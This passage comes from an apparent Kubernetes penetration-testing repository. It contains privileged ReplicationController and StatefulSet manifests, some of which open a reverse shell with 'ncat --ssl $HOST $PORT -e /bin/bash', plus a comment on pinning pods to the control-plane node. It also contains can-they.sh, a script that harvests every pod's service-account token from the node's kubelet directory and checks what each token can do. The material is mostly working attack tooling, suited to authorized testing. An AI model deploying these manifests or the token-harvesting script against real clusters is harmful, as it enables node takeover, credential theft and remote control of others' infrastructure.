3 | metadata: 4 | name: priv-revshell-replicationcontroller 5 | labels: 6 | app: pentest 7 | type: replicationcontroller 8 | spec: 9 | replicas: 2 10 | selector: 11 | app: pentest 12 | type: replicationcontroller 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicationcontroller 18 | spec: 19 | containers: 20 | - name: priv-revshell-replicationcontroller 21 | image: raesene/ncat 22 | securityContext: 23 | privileged: true 24 | command: [ "/bin/sh", "-c", "--" ] 25 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 26 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 27 | -------------------------------------------------------------------------------- /manifests/priv/statefulset/priv-exec-statefulset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: priv-exec-statefulset-service 5 | labels: 6 | app: pentest 7 | spec: 8 | ports: 9 | - port: 4444 10 | name: priv-exec-statefulset-service 11 | clusterIP: None 12 | selector: 13 | app: pentest 14 | --- 15 | apiVersion: apps/v1 16 | kind: StatefulSet 17 | metadata: 18 | name: priv-exec-statefulset 19 | labels: 20 | app: pentest 21 | type: statefulset 22 | spec: 23 | serviceName: "pentest" 24 | replicas: 2 25 | selector: 26 | matchLabels: 27 | app: pentest 28 | type: statefulset 29 | template: 30 | metadata: 31 | labels: 32 | app: pentest 33 | type: statefulset 34 | spec: 35 | containers: 36 | - name: priv-exec-statefulset 37 | image: ubuntu 38 | securityContext: 39 | privileged: true 40 | command: [ "/bin/sh", "-c", "--" ] 41 | args: [ "while 
true; do sleep 30; done;" ] 42 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 43 | -------------------------------------------------------------------------------- /manifests/priv/statefulset/priv-revshell-statefulset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: priv-revshell-statefulset-service 5 | labels: 6 | app: pentest 7 | spec: 8 | ports: 9 | - port: 4444 10 | name: priv-revshell-statefulset-service 11 | clusterIP: None 12 | selector: 13 | app: pentest 14 | --- 15 | apiVersion: apps/v1 16 | kind: StatefulSet 17 | metadata: 18 | name: priv-revshell-statefulset 19 | labels: 20 | app: pentest 21 | type: statefulset 22 | spec: 23 | serviceName: "pentest" 24 | replicas: 2 25 | selector: 26 | matchLabels: 27 | app: pentest 28 | type: statefulset 29 | template: 30 | metadata: 31 | labels: 32 | app: pentest 33 | type: statefulset 34 | spec: 35 | containers: 36 | - name: priv-revshell-statefulset 37 | image: raesene/ncat 38 | securityContext: 39 | privileged: true 40 | command: [ "/bin/sh", "-c", "--" ] 41 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 42 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 43 | -------------------------------------------------------------------------------- /scripts/can-they.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | ############################################################################### 3 | # Purpose: 4 | # 5 | # This script will find the token/secret for each pod running on the node and 6 | # tell you what each token is authorized to do. It can be run from within a pod 7 | # that has the host's filesystem mounted to /host, or from outside the pod. 
8 | # 9 | # Usage: 10 | # 11 | # *** For execution INSIDE a pod with the host's filesystem mounted to /host *** 12 | # 13 | # This mode is best for: 14 | # - everything-allowed 15 | # - hostPath 16 | # 17 | # Copy the can-they.sh helper script to the pod, download it from github, or manually create it 18 | # kubectl cp scripts/can-they.sh podname:/ 19 | # 20 | # Exec into pod (Don't chroot) 21 | # kubectl exec -it pod-name -- bash 22 | # 23 | # Run can-they.sh 24 | # ./can-they.sh -i "--list" 25 | # ./can-they.sh -i "--list -n kube-system" 26 | # ./can-they.sh -i "--list -n default" 27 | # ./can-they.sh -i "list secrets -n kube-system" 28 | # ./can-they.sh -i "create pods -n kube-system" 29 | # ./can-they.sh -i "create clusterrolebindings" 30 | # 31 | # 32 | # *** For execution OUTSIDE a pod *** 33 | # 34 | # This mode is best for: 35 | # - priv-and-hostpid 36 | # 37 | # Run can-they.sh 38 | # ./can-they.sh -n NAMESPACE -p POD_NAME -i "OPTIONS" 39 | # ./can-they.sh -n development -p priv-and-hostpid-exec-pod -i "list secrets -n kube-system" 40 | # ./can-they.sh -n development -p priv-and-hostpid-exec-pod -i "--list" 41 | # ./can-they.sh -n development -p priv-and-hostpid-exec-pod -i "-n kube-system" 42 | # ./can-they.sh -n development -p priv-and-hostpid-exec-pod -i "get secrets -n kube-system" 43 | # 44 | ############################################################################### 45 | function check-can-exec-pod { 46 | check=$(kubectl auth can-i create pods/exec -n $namespace) 47 | #echo $check 48 | if [[ $check == "no" ]]; then 49 | echo "Are you sure you have access to exec into $pod in the $namespace namespace?" 50 | exit 1 51 | fi 52 | } 53 | 54 | function run-outside-pod { 55 | # Get the filenames that contain tokens from the mounted host directory 56 | tokens=`kubectl exec -it $pod -n $namespace -- find /host/var/lib/kubelet/pods/ -name token -type l 2>/dev/null` 57 | 58 | # Backup plan in case you are chrooted or running on host 59 | if [ $? -eq 1 ]; then 60 | tokens=`kubectl exec -it $pod -n $namespace -- find /var/lib/kubelet/pods/ -name token -type l` 61 | fi 62 | #tokens=`kubectl exec -it $pod -n $namespace -- find /var/lib/kubelet/pods/ -name token -type l` 63 | for filename in $tokens; do 64 | filename_clean=`echo $filename | tr -dc '[[:print:]]'` 65 | echo "--------------------------------------------------------" 66 | echo "Token Location: $filename_clean" 67 | tokena=`kubectl exec -it $pod -n $namespace -- cat $filename_clean` 68 | echo -n "Can I $user_input? " 69 | SERVER=`kubectl config view --minify --flatten -ojsonpath='{.clusters[].cluster.server}'` 70 | export KUBECONFIG="dummy" 71 | #echo "kubectl --server=$SERVER --insecure-skip-tls-verify --token=$tokena auth can-i $user_input" 72 | echo 73 | kubectl --server=$SERVER --insecure-skip-tls-verify --token=$tokena auth can-i $user_input 2> /dev/null; echo; \ 74 | unset KUBECONFIG 75 | done 76 | } 77 | 78 | function am-i-inside-pod-check { 79 | echo $KUBERNETES_SERVICE_HOST 80 | if [[ -z $KUBERNETES_SERVICE_HOST ]]; then 81 | echo "It does not appear that you are in a Kubernetes pod." 82 | echo 83 | usage 84 | fi 85 | } 86 | 87 | function run-inside-pod { 88 | if [ !
-f "/usr/local/bin/kubectl" ]; then 89 | apt update && apt -y install curl 90 | #Download and install kubectl into pod 91 | curl -LO "https://storage.googleapis.com/kubernetes-release/release/$(curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt)/bin/linux/amd64/kubectl" 92 | chmod +x ./kubectl 93 | mv ./kubectl /usr/local/bin/kubectl 94 | fi 95 | 96 | # Get the filenames that contain tokens from the mounted host directory 97 | tokens=`find /host/var/lib/kubelet/pods/ -name token -type l` 98 | # Backup plan in case you are chrooted or running on host 99 | if [ $? -eq 1 ]; then 100 | tokens=`find /var/lib/kubelet/pods/ -name token -type l` 101 | fi 102 | #For each token, print the token location and run `kubectl auth can-i list` using each token via the `--token` command line argument. 103 | for filename in $tokens; do 104 | filename_clean=`echo $filename | tr -dc '[[:print:]]'` 105 | echo "--------------------------------------------------------" 106 | echo "Token Location: $filename_clean" 107 | tokena=`cat $filename_clean` 108 | echo -n "Can I $user_input? " 109 | kubectl --token=$tokena auth can-i $user_input 110 | echo 111 | done 112 | } 113 | 114 | function usage { 115 | echo "Usage: " 116 | echo 117 | echo " [From outside a pod]: $0 -p podname -n namespace [-i \"VERB [TYPE] [options]\"]" 118 | echo " [From inside a pod]: $0 [-i \"VERB [TYPE] [options]\"]" 119 | echo 120 | echo "Options: " 121 | echo 122 | printf " -p\tPod Name\n" 123 | printf " -n\tNamespace\n" 124 | printf " -i\tArugments that you would normally pass to kubectl auth can-i []\n" 125 | echo 126 | exit 1 127 | } 128 | 129 | while getopts n:p:i: flag 130 | do 131 | case "${flag}" in 132 | n) namespace=${OPTARG};; 133 | p) pod=${OPTARG};; 134 | i) user_input=${OPTARG};; 135 | *) usage;; 136 | esac 137 | done 138 | 139 | if [[ -z "$user_input" ]]; then 140 | user_input="--list" 141 | fi 142 | 143 | 144 | 145 | if [[ "$namespace" ]] && [[ "$pod" ]]; then 146 | #echo "outside" 147 | check-can-exec-pod 148 | run-outside-pod 149 | 150 | elif [[ -z "$namespace" ]] && [[ -z "$pod" ]]; then 151 | #echo "inside" 152 | am-i-inside-pod-check 153 | run-inside-pod 154 | else 155 | echo "If running this script from outside a pod, you need to specify both the pod name and the namespace" 156 | usage 157 | fi 158 | --------------------------------------------------------------------------------